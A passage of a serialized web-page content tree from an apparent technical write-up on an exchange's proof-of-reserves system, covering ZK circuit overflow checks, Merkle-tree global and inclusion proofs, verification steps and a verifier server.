"type":26,"tag":137,"props":98225,"children":98227},{"className":98226},[169,170],[98228],{"type":32,"value":24313},{"type":26,"tag":137,"props":98230,"children":98232},{"className":98231,"style":621},[169],[98233],{"type":32,"value":5666},{"type":26,"tag":137,"props":98235,"children":98237},{"className":98236},[169,170],[98238],{"type":32,"value":35},{"type":26,"tag":137,"props":98240,"children":98242},{"className":98241,"style":621},[169,170],[98243],{"type":32,"value":624},{"type":26,"tag":137,"props":98245,"children":98247},{"className":98246},[169,170],[98248],{"type":32,"value":506},{"type":26,"tag":137,"props":98250,"children":98252},{"className":98251},[169,170],[98253],{"type":32,"value":95671},{"type":26,"tag":137,"props":98255,"children":98257},{"className":98256},[162],[98258],{"type":32,"value":3016},{"type":26,"tag":137,"props":98260,"children":98262},{"className":98261},[169,170],[98263],{"type":32,"value":41},{"type":26,"tag":137,"props":98265,"children":98267},{"className":98266},[169,170],[98268],{"type":32,"value":95638},{"type":26,"tag":137,"props":98270,"children":98272},{"className":98271},[169,170],[98273],{"type":32,"value":24313},{"type":26,"tag":137,"props":98275,"children":98277},{"className":98276,"style":621},[169],[98278],{"type":32,"value":5666},{"type":26,"tag":137,"props":98280,"children":98282},{"className":98281},[169,170],[98283],{"type":32,"value":1549},{"type":26,"tag":137,"props":98285,"children":98287},{"className":98286},[169,170],[98288],{"type":32,"value":95898},{"type":26,"tag":137,"props":98290,"children":98292},{"className":98291},[169,170],[98293],{"type":32,"value":53736},{"type":26,"tag":137,"props":98295,"children":98297},{"className":98296},[197],[98298],{"type":32,"value":3079},{"type":26,"tag":137,"props":98300,"children":98302},{"className":98301,"style":281},[184],[],{"type":26,"tag":137,"props":98304,"children":98306},{"className":98305},[286],[98307],{"type":32,"value":11161},{"type":26,"tag":137,"props":98309,"children":98311},{"className":98310,"style":281},[184],[],{"type":26,"tag":137,"props":98313,"children":98315},{"className":98314},[151],[98316,98320,98325,98330,98335,98340,98345,98402,98407,98412,98417,98422,98427,98432,98437,98442,98447,98452,98457,98462,98467,98472,98477,98482,98487,98492,98497,98502,98507,98512,98517],{"type":26,"tag":137,"props":98317,"children":98319},{"className":98318,"style":95590},[156],[],{"type":26,"tag":137,"props":98321,"children":98323},{"className":98322},[169,170],[98324],{"type":32,"value":13242},{"type":26,"tag":137,"props":98326,"children":98328},{"className":98327},[169,170],[98329],{"type":32,"value":95898},{"type":26,"tag":137,"props":98331,"children":98333},{"className":98332},[169,170],[98334],{"type":32,"value":2832},{"type":26,"tag":137,"props":98336,"children":98338},{"className":98337},[169,170],[98339],{"type":32,"value":35},{"type":26,"tag":137,"props":98341,"children":98343},{"className":98342},[169,170],[98344],{"type":32,"value":97977},{"type":26,"tag":137,"props":98346,"children":98348},{"className":98347},[169],[98349,98354],{"type":26,"tag":137,"props":98350,"children":98352},{"className":98351,"style":1039},[169,170],[98353],{"type":32,"value":1042},{"type":26,"tag":137,"props":98355,"children":98357},{"className":98356},[236],[98358],{"type":26,"tag":137,"props":98359,"children":98361},{"className":98360},[241,417],[98362,98391],{"type":26,"tag":137,"props":98363,"children":98365},{"className":98364},[246],[98366,98386],{"type":26,"tag":137,"props":98367,"children":98369},{"className":98368,"style":556},[251],[98370],{"type":26,"tag":137,"props":98371,"children":98372},{"style":1061},[98373,98377],{"type":26,"tag":137,"props":98374,"children":98376},{"className":98375,"style":262},[261],[],{"type":26,"tag":137,"props":98378,"children":98380},{"className":98379},[267,268,269,270],[98381],{"type":26,"tag":137,"props":98382,"children":98384},{"className":98383},[169,170,270],[98385],{"type":32,"value":506},{"type":26,"tag":137,"props":98387,"children":98389},{"className":98388},[453],[98390],{"type":32,"value":456},{"type":26,"tag":137,"props":98392,"children":98394},{"className":98393},[246],[98395],{"type":26,"tag":137,"props":98396,"children":98398},{"className":98397,"style":464},[251],[98399],{"type":26,"tag":137,"props":98400,"children":98401},{},[],{"type":26,"tag":137,"props":98403,"children":98405},{"className":98404},[169],[98406],{"type":32,"value":470},{"type":26,"tag":137,"props":98408,"children":98410},{"className":98409},[169,170],[98411],{"type":32,"value":35},{"type":26,"tag":137,"props":98413,"children":98415},{"className":98414},[169,170],[98416],{"type":32,"value":95898},{"type":26,"tag":137,"props":98418,"children":98420},{"className":98419},[169,170],[98421],{"type":32,"value":2832},{"type":26,"tag":137,"props":98423,"children":98425},{"className":98424,"style":537},[169,170],[98426],{"type":32,"value":540},{"type":26,"tag":137,"props":98428,"children":98430},{"className":98429},[169,170],[98431],{"type":32,"value":506},{"type":26,"tag":137,"props":98433,"children":98435},{"className":98434},[169,170],[98436],{"type":32,"value":4326},{"type":26,"tag":137,"props":98438,"children":98440},{"className":98439,"style":621},[169],[98441],{"type":32,"value":5666},{"type":26,"tag":137,"props":98443,"children":98445},{"className":98444},[169,170],[98446],{"type":32,"value":98080},{"type":26,"tag":137,"props":98448,"children":98450},{"className":98449},[169,170],[98451],{"type":32,"value":35},{"type":26,"tag":137,"props":98453,"children":98455},{"className":98454},[169,170],[98456],{"type":32,"value":95898},{"type":26,"tag":137,"props":98458,"children":98460},{"className":98459},[169,170],[98461],{"type":32,"value":24313},{"type":26,"tag":137,"props":98463,"children":98465},{"className":98464},[169],[98466],{"type":32,"value":470},{"type":26,"tag":137,"props":98468,"children":98470},{"className":98469},[169,170],[98471],{"type":32,"value":41},{"type":26,"tag":137,"props":98473,"children":98475},{"className":98474},[169,170],[98476],{"type":32,"value":95638},{"type":26,"tag":137,"props":98478,"children":98480},{"className":98479},[169,170],[98481],{"type":32,"value":24313},{"type":26,"tag":137,"props":98483,"children":98485},{"className":98484,"style":621},[169],[98486],{"type":32,"value":5666},{"type":26,"tag":137,"props":98488,"children":98490},{"className":98489},[169,170],[98491],{"type":32,"value":35},{"type":26,"tag":137,"props":98493,"children":98495},{"className":98494,"style":621},[169,170],[98496],{"type":32,"value":624},{"type":26,"tag":137,"props":98498,"children":98500},{"className":98499},[169,170],[98501],{"type":32,"value":506},{"type":26,"tag":137,"props":98503,"children":98505},{"className":98504},[169,170],[98506],{"type":32,"value":96464},{"type":26,"tag":137,"props":98508,"children":98510},{"className":98509},[162],[98511],{"type":32,"value":3016},{"type":26,"tag":137,"props":98513,"children":98515},{"className":98514},[169],[98516],{"type":32,"value":1817},{"type":26,"tag":137,"props":98518,"children":98520},{"className":98519},[197],[98521],{"type":32,"value":3079},{"type":26,"tag":3430,"props":98523,"children":98524},{},[98525,98883,98884],{"type":26,"tag":130,"props":98526,"children":98528},{"className":98527},[133,134],[98529],{"type":26,"tag":137,"props":98530,"children":98532},{"className":98531},[140],[98533],{"type":26,"tag":137,"props":98534,"children":98536},{"className":98535,"ariaHidden":146},[145],[98537,98643],{"type":26,"tag":137,"props":98538,"children":98540},{"className":98539},[151],[98541,98545,98550,98555,98560,98565,98570,98575,98580,98585,98590,98595,98600,98605,98610,98615,98620,98625,98630,98634,98639],{"type":26,"tag":137,"props":98542,"children":98544},{"className":98543,"style":95590},[156],[],{"type":26,"tag":137,"props":98546,"children":98548},{"className":98547},[169,170],[98549],{"type":32,"value":41},{"type":26,"tag":137,"props":98551,"children":98553},{"className":98552},[169,170],[98554],{"type":32,"value":95638},{"type":26,"tag":137,"props":98556,"children":98558},{"className":98557},[169,170],[98559],{"type":32,"value":24313},{"type":26,"tag":137,"props":98561,"children":98563},{"className":98562,"style":621},[169],[98564],{"type":32,"value":5666},{"type":26,"tag":137,"props":98566,"children":98568},{"className":98567},[169,170],[98569],{"type":32,"value":35},{"type":26,"tag":137,"props":98571,"children":98573},{"className":98572,"style":621},[169,170],[98574],{"type":32,"value":624},{"type":26,"tag":137,"props":98576,"children":98578},{"className":98577},[169,170],[98579],{"type":32,"value":506},{"type":26,"tag":137,"props":98581,"children":98583},{"className":98582},[169,170],[98584],{"type":32,"value":95671},{"type":26,"tag":137,"props":98586,"children":98588},{"className":98587},[162],[98589],{"type":32,"value":3016},{"type":26,"tag":137,"props":98591,"children":98593},{"className":98592},[169,170],[98594],{"type":32,"value":41},{"type":26,"tag":137,"props":98596,"children":98598},{"className":98597},[169,170],[98599],{"type":32,"value":95638},{"type":26,"tag":137,"props":98601,"children":98603},{"className":98602},[169,170],[98604],{"type":32,"value":24313},{"type":26,"tag":137,"props":98606,"children":98608},{"className":98607,"style":621},[169],[98609],{"type":32,"value":5666},{"type":26,"tag":137,"props":98611,"children":98613},{"className":98612},[169,170],[98614],{"type":32,"value":1549},{"type":26,"tag":137,"props":98616,"children":98618},{"className":98617},[169,170],[98619],{"type":32,"value":95898},{"type":26,"tag":137,"props":98621,"children":98623},{"className":98622},[169,170],[98624],{"type":32,"value":53736},{"type":26,"tag":137,"props":98626,"children":98628},{"className":98627},[197],[98629],{"type":32,"value":3079},{"type":26,"tag":137,"props":98631,"children":98633},{"className":98632,"style":281},[184],[],{"type":26,"tag":137,"props":98635,"children":98637},{"className":98636},[286],[98638],{"type":32,"value":11161},{"type":26,"tag":137,"props":98640,"children":98642},{"className":98641,"style":281},[184],[],{"type":26,"tag":137,"props":98644,"children":98646},{"className":98645},[151],[98647,98651,98656,98661,98666,98671,98676,98733,98738,98743,98748,98753,98758,98763,98768,98773,98778,98783,98788,98793,98798,98803,98808,98813,98818,98823,98828,98833,98838,98843,98848,98853,98858,98863,98868,98873,98878],{"type":26,"tag":137,"props":98648,"children":98650},{"className":98649,"style":95590},[156],[],{"type":26,"tag":137,"props":98652,"children":98654},{"className":98653},[169,170],[98655],{"type":32,"value":13242},{"type":26,"tag":137,"props":98657,"children":98659},{"className":98658},[169,170],[98660],{"type":32,"value":95898},{"type":26,"tag":137,"props":98662,"children":98664},{"className":98663},[169,170],[98665],{"type":32,"value":2832},{"type":26,"tag":137,"props":98667,"children":98669},{"className":98668},[169,170],[98670],{"type":32,"value":35},{"type":26,"tag":137,"props":98672,"children":98674},{"className":98673},[169,170],[98675],{"type":32,"value":97977},{"type":26,"tag":137,"props":98677,"children":98679},{"className":98678},[169],[98680,98685],{"type":26,"tag":137,"props":98681,"children":98683},{"className":98682,"style":1039},[169,170],[98684],{"type":32,"value":1042},{"type":26,"tag":137,"props":98686,"children":98688},{"className":98687},[236],[98689],{"type":26,"tag":137,"props":98690,"children":98692},{"className":98691},[241,417],[98693,98722],{"type":26,"tag":137,"props":98694,"children":98696},{"className":98695},[246],[98697,98717],{"type":26,"tag":137,"props":98698,"children":98700},{"className":98699,"style":556},[251],[98701],{"type":26,"tag":137,"props":98702,"children":98703},{"style":1061},[98704,98708],{"type":26,"tag":137,"props":98705,"children":98707},{"className":98706,"style":262},[261],[],{"type":26,"tag":137,"props":98709,"children":98711},{"className":98710},[267,268,269,270],[98712],{"type":26,"tag":137,"props":98713,"children":98715},{"className":98714},[169,170,270],[98716],{"type":32,"value":506},{"type":26,"tag":137,"props":98718,"children":98720},{"className":98719},[453],[98721],{"type":32,"value":456},{"type":26,"tag":137,"props":98723,"children":98725},{"className":98724},[246],[98726],{"type":26,"tag":137,"props":98727,"children":98729},{"className":98728,"style":464},[251],[98730],{"type":26,"tag":137,"props":98731,"children":98732},{},[],{"type":26,"tag":137,"props":98734,"children":98736},{"className":98735},[169],[98737],{"type":32,"value":470},{"type":26,"tag":137,"props":98739,"children":98741},{"className":98740},[169,170],[98742],{"type":32,"value":35},{"type":26,"tag":137,"props":98744,"children":98746},{"className":98745},[169,170],[98747],{"type":32,"value":95898},{"type":26,"tag":137,"props":98749,"children":98751},{"className":98750},[169,170],[98752],{"type":32,"value":2832},{"type":26,"tag":137,"props":98754,"children":98756},{"className":98755,"style":537},[169,170],[98757],{"type":32,"value":540},{"type":26,"tag":137,"props":98759,"children":98761},{"className":98760},[169,170],[98762],{"type":32,"value":506},{"type":26,"tag":137,"props":98764,"children":98766},{"className":98765},[169,170],[98767],{"type":32,"value":4326},{"type":26,"tag":137,"props":98769,"children":98771},{"className":98770,"style":621},[169],[98772],{"type":32,"value":5666},{"type":26,"tag":137,"props":98774,"children":98776},{"className":98775},[169,170],[98777],{"type":32,"value":98080},{"type":26,"tag":137,"props":98779,"children":98781},{"className":98780},[169,170],[98782],{"type":32,"value":35},{"type":26,"tag":137,"props":98784,"children":98786},{"className":98785},[169,170],[98787],{"type":32,"value":95898},{"type":26,"tag":137,"props":98789,"children":98791},{"className":98790},[169,170],[98792],{"type":32,"value":24313},{"type":26,"tag":137,"props":98794,"children":98796},{"className":98795},[169],[98797],{"type":32,"value":470},{"type":26,"tag":137,"props":98799,"children":98801},{"className":98800},[169,170],[98802],{"type":32,"value":41},{"type":26,"tag":137,"props":98804,"children":98806},{"className":98805},[169,170],[98807],{"type":32,"value":95638},{"type":26,"tag":137,"props":98809,"children":98811},{"className":98810},[169,170],[98812],{"type":32,"value":24313},{"type":26,"tag":137,"props":98814,"children":98816},{"className":98815,"style":621},[169],[98817],{"type":32,"value":5666},{"type":26,"tag":137,"props":98819,"children":98821},{"className":98820},[169,170],[98822],{"type":32,"value":35},{"type":26,"tag":137,"props":98824,"children":98826},{"className":98825,"style":621},[169,170],[98827],{"type":32,"value":624},{"type":26,"tag":137,"props":98829,"children":98831},{"className":98830},[169,170],[98832],{"type":32,"value":506},{"type":26,"tag":137,"props":98834,"children":98836},{"className":98835},[169,170],[98837],{"type":32,"value":96464},{"type":26,"tag":137,"props":98839,"children":98841},{"className":98840},[162],[98842],{"type":32,"value":3016},{"type":26,"tag":137,"props":98844,"children":98846},{"className":98845},[169,170],[98847],{"type":32,"value":41},{"type":26,"tag":137,"props":98849,"children":98851},{"className":98850},[169,170],[98852],{"type":32,"value":95638},{"type":26,"tag":137,"props":98854,"children":98856},{"className":98855},[169,170],[98857],{"type":32,"value":24313},{"type":26,"tag":137,"props":98859,"children":98861},{"className":98860,"style":621},[169],[98862],{"type":32,"value":5666},{"type":26,"tag":137,"props":98864,"children":98866},{"className":98865},[169,170],[98867],{"type":32,"value":1549},{"type":26,"tag":137,"props":98869,"children":98871},{"className":98870},[169,170],[98872],{"type":32,"value":95898},{"type":26,"tag":137,"props":98874,"children":98876},{"className":98875},[169,170],[98877],{"type":32,"value":53736},{"type":26,"tag":137,"props":98879,"children":98881},{"className":98880},[197],[98882],{"type":32,"value":3079},{"type":32,"value":1011},{"type":26,"tag":84,"props":98885,"children":98886},{},[98887],{"type":32,"value":98888},"(verifies if all asset prices are the same)",{"type":26,"tag":3430,"props":98890,"children":98891},{},[98892,99271,99272],{"type":26,"tag":130,"props":98893,"children":98895},{"className":98894},[133,134],[98896],{"type":26,"tag":137,"props":98897,"children":98899},{"className":98898},[140],[98900],{"type":26,"tag":137,"props":98901,"children":98903},{"className":98902,"ariaHidden":146},[145],[98904,98985],{"type":26,"tag":137,"props":98905,"children":98907},{"className":98906},[151],[98908,98912,98917,98922,98927,98932,98937,98942,98947,98952,98957,98962,98967,98972,98976,98981],{"type":26,"tag":137,"props":98909,"children":98911},{"className":98910,"style":97046},[156],[],{"type":26,"tag":137,"props":98913,"children":98915},{"className":98914},[169,170],[98916],{"type":32,"value":53736},{"type":26,"tag":137,"props":98918,"children":98920},{"className":98919,"style":621},[169,170],[98921],{"type":32,"value":97058},{"type":26,"tag":137,"props":98923,"children":98925},{"className":98924,"style":97062},[169,170],[98926],{"type":32,"value":91286},{"type":26,"tag":137,"props":98928,"children":98930},{"className":98929,"style":537},[169,170],[98931],{"type":32,"value":540},{"type":26,"tag":137,"props":98933,"children":98935},{"className":98934},[169,170],[98936],{"type":32,"value":54057},{"type":26,"tag":137,"props":98938,"children":98940},{"className":98939,"style":621},[169],[98941],{"type":32,"value":5666},{"type":26,"tag":137,"props":98943,"children":98945},{"className":98944},[169,170],[98946],{"type":32,"value":24313},{"type":26,"tag":137,"props":98948,"children":98950},{"className":98949},[169,170],[98951],{"type":32,"value":97090},{"type":26,"tag":137,"props":98953,"children":98955},{"className":98954,"style":621},[169],[98956],{"type":32,"value":5666},{"type":26,"tag":137,"props":98958,"children":98960},{"className":98959},[169,170],[98961],{"type":32,"value":97101},{"type":26,"tag":137,"props":98963,"children":98965},{"className":98964},[169,170],[98966],{"type":32,"value":13242},{"type":26,"tag":137,"props":98968,"children":98970},{"className":98969},[169,170],[98971],{"type":32,"value":86947},{"type":26,"tag":137,"props":98973,"children":98975},{"className":98974,"style":281},[184],[],{"type":26,"tag":137,"props":98977,"children":98979},{"className":98978},[286],[98980],{"type":32,"value":11161},{"type":26,"tag":137,"props":98982,"children":98984},{"className":98983,"style":281},[184],[],{"type":26,"tag":137,"props":98986,"children":98988},{"className":98987},[151],[98989,98993,98998,99003,99008,99013,99018,99023,99028,99033,99038,99095,99100,99104,99109,99114,99171,99176,99180,99185,99190,99194,99199,99204,99266],{"type":26,"tag":137,"props":98990,"children":98992},{"className":98991,"style":157},[156],[],{"type":26,"tag":137,"props":98994,"children":98996},{"className":98995,"style":1731},[169,170],[98997],{"type":32,"value":24181},{"type":26,"tag":137,"props":98999,"children":99001},{"className":99000},[169,170],[99002],{"type":32,"value":95602},{"type":26,"tag":137,"props":99004,"children":99006},{"className":99005},[169,170],[99007],{"type":32,"value":506},{"type":26,"tag":137,"props":99009,"children":99011},{"className":99010},[169,170],[99012],{"type":32,"value":3293},{"type":26,"tag":137,"props":99014,"children":99016},{"className":99015},[169,170],[99017],{"type":32,"value":705},{"type":26,"tag":137,"props":99019,"children":99021},{"className":99020},[169,170],[99022],{"type":32,"value":1549},{"type":26,"tag":137,"props":99024,"children":99026},{"className":99025},[162],[99027],{"type":32,"value":165},{"type":26,"tag":137,"props":99029,"children":99031},{"className":99030},[169,170],[99032],{"type":32,"value":97101},{"type":26,"tag":137,"props":99034,"children":99036},{"className":99035},[169,170],[99037],{"type":32,"value":13242},{"type":26,"tag":137,"props":99039,"children":99041},{"className":99040},[169],[99042,99047],{"type":26,"tag":137,"props":99043,"children":99045},{"className":99044},[169,170],[99046],{"type":32,"value":86947},{"type":26,"tag":137,"props":99048,"children":99050},{"className":99049},[236],[99051],{"type":26,"tag":137,"props":99052,"children":99054},{"className":99053},[241,417],[99055,99084],{"type":26,"tag":137,"props":99056,"children":99058},{"className":99057},[246],[99059,99079],{"type":26,"tag":137,"props":99060,"children":99062},{"className":99061,"style":426},[251],[99063],{"type":26,"tag":137,"props":99064,"children":99065},{"style":430},[99066,99070],{"type":26,"tag":137,"props":99067,"children":99069},{"className":99068,"style":262},[261],[],{"type":26,"tag":137,"props":99071,"children":99073},{"className":99072},[267,268,269,270],[99074],{"type":26,"tag":137,"props":99075,"children":99077},{"className":99076},[169,270],[99078],{"type":32,"value":1817},{"type":26,"tag":137,"props":99080,"children":99082},{"className":99081},[453],[99083],{"type":32,"value":456},{"type":26,"tag":137,"props":99085,"children":99087},{"className":99086},[246],[99088],{"type":26,"tag":137,"props":99089,"children":99091},{"className":99090,"style":464},[251],[99092],{"type":26,"tag":137,"props":99093,"children":99094},{},[],{"type":26,"tag":137,"props":99096,"children":99098},{"className":99097},[177],[99099],{"type":32,"value":180},{"type":26,"tag":137,"props":99101,"children":99103},{"className":99102,"style":185},[184],[],{"type":26,"tag":137,"props":99105,"children":99107},{"className":99106},[169,170],[99108],{"type":32,"value":97101},{"type":26,"tag":137,"props":99110,"children":99112},{"className":99111},[169,170],[99113],{"type":32,"value":13242},{"type":26,"tag":137,"props":99115,"children":99117},{"className":99116},[169],[99118,99123],{"type":26,"tag":137,"props":99119,"children":99121},{"className":99120},[169,170],[99122],{"type":32,"value":86947},{"type":26,"tag":137,"props":99124,"children":99126},{"className":99125},[236],[99127],{"type":26,"tag":137,"props":99128,"children":99130},{"className":99129},[241,417],[99131,99160],{"type":26,"tag":137,"props":99132,"children":99134},{"className":99133},[246],[99135,99155],{"type":26,"tag":137,"props":99136,"children":99138},{"className":99137,"style":426},[251],[99139],{"type":26,"tag":137,"props":99140,"children":99141},{"style":430},[99142,99146],{"type":26,"tag":137,"props":99143,"children":99145},{"className":99144,"style":262},[261],[],{"type":26,"tag":137,"props":99147,"children":99149},{"className":99148},[267,268,269,270],[99150],{"type":26,"tag":137,"props":99151,"children":99153},{"className":99152},[169,270],[99154],{"type":32,"value":878},{"type":26,"tag":137,"props":99156,"children":99158},{"className":99157},[453],[99159],{"type":32,"value":456},{"type":26,"tag":137,"props":99161,"children":99163},{"className":99162},[246],[99164],{"type":26,"tag":137,"props":99165,"children":99167},{"className":99166,"style":464},[251],[99168],{"type":26,"tag":137,"props":99169,"children":99170},{},[],{"type":26,"tag":137,"props":99172,"children":99174},{"className":99173},[177],[99175],{"type":32,"value":180},{"type":26,"tag":137,"props":99177,"children":99179},{"className":99178,"style":185},[184],[],{"type":26,"tag":137,"props":99181,"children":99183},{"className":99182},[169],[99184],{"type":32,"value":12180},{"type":26,"tag":137,"props":99186,"children":99188},{"className":99187},[177],[99189],{"type":32,"value":180},{"type":26,"tag":137,"props":99191,"children":99193},{"className":99192,"style":185},[184],[],{"type":26,"tag":137,"props":99195,"children":99197},{"className":99196},[169,170],[99198],{"type":32,"value":97101},{"type":26,"tag":137,"props":99200,"children":99202},{"className":99201},[169,170],[99203],{"type":32,"value":13242},{"type":26,"tag":137,"props":99205,"children":99207},{"className":99206},[169],[99208,99213],{"type":26,"tag":137,"props":99209,"children":99211},{"className":99210},[169,170],[99212],{"type":32,"value":86947},{"type":26,"tag":137,"props":99214,"children":99216},{"className":99215},[236],[99217],{"type":26,"tag":137,"props":99218,"children":99220},{"className":99219},[241,417],[99221,99255],{"type":26,"tag":137,"props":99222,"children":99224},{"className":99223},[246],[99225,99250],{"type":26,"tag":137,"props":99226,"children":99228},{"className":99227,"style":426},[251],[99229],{"type":26,"tag":137,"props":99230,"children":99231},{"style":430},[99232,99236],{"type":26,"tag":137,"props":99233,"children":99235},{"className":99234,"style":262},[261],[],{"type":26,"tag":137,"props":99237,"children":99239},{"className":99238},[267,268,269,270],[99240],{"type":26,"tag":137,"props":99241,"children":99243},{"className":99242},[169,270],[99244],{"type":26,"tag":137,"props":99245,"children":99247},{"className":99246},[169,270],[99248],{"type":32,"value":99249},"31",{"type":26,"tag":137,"props":99251,"children":99253},{"className":99252},[453],[99254],{"type":32,"value":456},{"type":26,"tag":137,"props":99256,"children":99258},{"className":99257},[246],[99259],{"type":26,"tag":137,"props":99260,"children":99262},{"className":99261,"style":464},[251],[99263],{"type":26,"tag":137,"props":99264,"children":99265},{},[],{"type":26,"tag":137,"props":99267,"children":99269},{"className":99268},[197],[99270],{"type":32,"value":200},{"type":32,"value":1011},{"type":26,"tag":84,"props":99273,"children":99274},{},[99275],{"type":32,"value":97421},{"type":26,"tag":3430,"props":99277,"children":99278},{},[99279,99284,99285],{"type":26,"tag":762,"props":99280,"children":99281},{},[99282],{"type":32,"value":99283},"checks if each sum is overflowing by checking if the sum of two positive numbers results in a negative one",{"type":32,"value":1011},{"type":26,"tag":84,"props":99286,"children":99287},{},[99288],{"type":32,"value":97703},{"type":26,"tag":35,"props":99290,"children":99291},{},[99292],{"type":32,"value":99293},"Here is a visual scheme of the inputs of the recursive circuit. Note that this tree only has three levels (L1, L2, L3). Depending on the number of users, it may have more recursive levels:",{"type":26,"tag":35,"props":99295,"children":99296},{},[99297],{"type":26,"tag":2210,"props":99298,"children":99300},{"alt":53181,"src":99299},"/posts/por/recursive-circuit.png",[],{"type":26,"tag":92,"props":99302,"children":99304},{"id":99303},"global-proof-and-inclusion-proofs",[99305],{"type":32,"value":99306},"Global Proof and Inclusion Proofs",{"type":26,"tag":118,"props":99308,"children":99309},{"id":11870},[99310],{"type":32,"value":99311},"Proving",{"type":26,"tag":35,"props":99313,"children":99314},{},[99315,99317,99323,99324,99330,99331,99337],{"type":32,"value":99316},"After proving all batch circuits and all recursive circuits, we have the final proof (which is the ZK proof of the recursive tree root), the entire Merkle tree, and the user nonces. In our code, it is serialized to ",{"type":26,"tag":130,"props":99318,"children":99320},{"className":99319},[],[99321],{"type":32,"value":99322},"merkle_tree.json",{"type":32,"value":1108},{"type":26,"tag":130,"props":99325,"children":99327},{"className":99326},[],[99328],{"type":32,"value":99329},"final_proof.json",{"type":32,"value":3525},{"type":26,"tag":130,"props":99332,"children":99334},{"className":99333},[],[99335],{"type":32,"value":99336},"private_nonces.json",{"type":32,"value":99338}," files.",{"type":26,"tag":35,"props":99340,"children":99341},{},[99342],{"type":32,"value":99343},"Using the ZK proof and the Merkle tree, we can already prove the sum of the asset balances and their non-negativity; we refer to this as the \"global proof.\"",{"type":26,"tag":35,"props":99345,"children":99346},{},[99347,99349,99355,99357,99362],{"type":32,"value":99348},"For the user inclusion proofs, we get the Merkle tree, the user asset balances, the identification hash, and the nonce to bundle it in one proof file (",{"type":26,"tag":130,"props":99350,"children":99352},{"className":99351},[],[99353],{"type":32,"value":99354},"inclusion_proof_\u003Cid>.json",{"type":32,"value":99356},"). ",{"type":26,"tag":762,"props":99358,"children":99359},{},[99360],{"type":32,"value":99361},"We bundle only a part of the Merkle tree to the inclusion proof file to make the proof smaller",{"type":32,"value":470},{"type":26,"tag":118,"props":99364,"children":99366},{"id":99365},"verifying",[99367],{"type":32,"value":99368},"Verifying",{"type":26,"tag":35,"props":99370,"children":99371},{},[99372],{"type":26,"tag":84,"props":99373,"children":99374},{},[99375],{"type":32,"value":99376},"Global Proof",{"type":26,"tag":35,"props":99378,"children":99379},{},[99380,99382,99387,99388,99393],{"type":32,"value":99381},"To verify the global proof, the code deserializes the ",{"type":26,"tag":130,"props":99383,"children":99385},{"className":99384},[],[99386],{"type":32,"value":99322},{"type":32,"value":40146},{"type":26,"tag":130,"props":99389,"children":99391},{"className":99390},[],[99392],{"type":32,"value":99329},{"type":32,"value":99394}," files and performs these checks:",{"type":26,"tag":4820,"props":99396,"children":99397},{},[99398,99403,99408,99413,99439],{"type":26,"tag":3430,"props":99399,"children":99400},{},[99401],{"type":32,"value":99402},"Validate if the final proof was generated with a valid and trusted circuit.",{"type":26,"tag":3430,"props":99404,"children":99405},{},[99406],{"type":32,"value":99407},"Verify the ZK final proof.",{"type":26,"tag":3430,"props":99409,"children":99410},{},[99411],{"type":32,"value":99412},"Verify if asset prices are valid. (It doesn't verify if it matches the real price; you need to do it manually. It only verifies if decimals are valid.)",{"type":26,"tag":3430,"props":99414,"children":99415},{},[99416,99418,99424,99426,99431,99432,99437],{"type":32,"value":99417},"Verify if the Merkle tree root hash is the same as the final proof ",{"type":26,"tag":130,"props":99419,"children":99421},{"className":99420},[],[99422],{"type":32,"value":99423},"merkle_tree_hash",{"type":32,"value":99425}," public input. This ensures that the ",{"type":26,"tag":130,"props":99427,"children":99429},{"className":99428},[],[99430],{"type":32,"value":99322},{"type":32,"value":3339},{"type":26,"tag":130,"props":99433,"children":99435},{"className":99434},[],[99436],{"type":32,"value":99329},{"type":32,"value":99438}," are linked (they belong to the same global proof).",{"type":26,"tag":3430,"props":99440,"children":99441},{},[99442],{"type":32,"value":99443},"Verify the entire Merkle tree by hashing all the nodes again, starting with the batch circuit, since the verifier won't have the necessary information to hash the leaves again (for privacy). This ensures that the tree was not tampered with.",{"type":26,"tag":35,"props":99445,"children":99446},{},[99447],{"type":26,"tag":84,"props":99448,"children":99449},{},[99450],{"type":32,"value":99451},"Inclusion Proof",{"type":26,"tag":35,"props":99453,"children":99454},{},[99455,99457,99462,99464,99469],{"type":32,"value":99456},"To verify the inclusion proof, the code deserializes the ",{"type":26,"tag":130,"props":99458,"children":99460},{"className":99459},[],[99461],{"type":32,"value":99354},{"type":32,"value":99463}," file and also the ",{"type":26,"tag":130,"props":99465,"children":99467},{"className":99466},[],[99468],{"type":32,"value":99329},{"type":32,"value":99470},". After that, it performs these checks:",{"type":26,"tag":4820,"props":99472,"children":99473},{},[99474,99478,99483,99488],{"type":26,"tag":3430,"props":99475,"children":99476},{},[99477],{"type":32,"value":99407},{"type":26,"tag":3430,"props":99479,"children":99480},{},[99481],{"type":32,"value":99482},"Verify if the Merkle tree root is the same as in the final proof.",{"type":26,"tag":3430,"props":99484,"children":99485},{},[99486],{"type":32,"value":99487},"Recalculate the user-related node leaf hash.",{"type":26,"tag":3430,"props":99489,"children":99490},{},[99491],{"type":32,"value":99492},"Verify a partial Merkle tree using the recalculated hash (it doesn't contain all the leaves).",{"type":26,"tag":92,"props":99494,"children":99496},{"id":99495},"por-verifier-server",[99497],{"type":32,"value":99498},"PoR Verifier Server",{"type":26,"tag":35,"props":99500,"children":99501},{},[99502,99504,99510],{"type":32,"value":99503},"To automate the verification process, we created a ",{"type":26,"tag":41,"props":99505,"children":99507},{"href":95159,"rel":99506},[45],[99508],{"type":32,"value":99509},"verifier server",{"type":32,"value":99511}," that the exchange can submit the proofs into. Once submitted, the proof is validated and added to the database.",{"type":26,"tag":35,"props":99513,"children":99514},{},[99515],{"type":32,"value":99516},"Once the proof was added, any user can enter the website and see its information (see backpack's example):",{"type":26,"tag":35,"props":99518,"children":99519},{},[99520],{"type":26,"tag":2210,"props":99521,"children":99523},{"alt":53181,"src":99522},"/posts/por/backpack-por.png",[],{"type":26,"tag":35,"props":99525,"children":99526},{},[99527],{"type":32,"value":99528},"Here is a breakdown of what fields represent and why they are required:",{"type":26,"tag":3426,"props":99530,"children":99531},{},[99532,99542,99552,99562,99572,99582],{"type":26,"tag":3430,"props":99533,"children":99534},{},[99535,99540],{"type":26,"tag":84,"props":99536,"children":99537},{},[99538],{"type":32,"value":99539},"Status",{"type":32,"value":99541}," --> verifies if the proof is valid, ensuring that the information has not been tampered with.",{"type":26,"tag":3430,"props":99543,"children":99544},{},[99545,99550],{"type":26,"tag":84,"props":99546,"children":99547},{},[99548],{"type":32,"value":99549},"Proof Timestamp",{"type":32,"value":99551}," --> when the proof was generated by the exchange.",{"type":26,"tag":3430,"props":99553,"children":99554},{},[99555,99560],{"type":26,"tag":84,"props":99556,"children":99557},{},[99558],{"type":32,"value":99559},"Verify Timestamp",{"type":32,"value":99561}," --> when the proof was verified 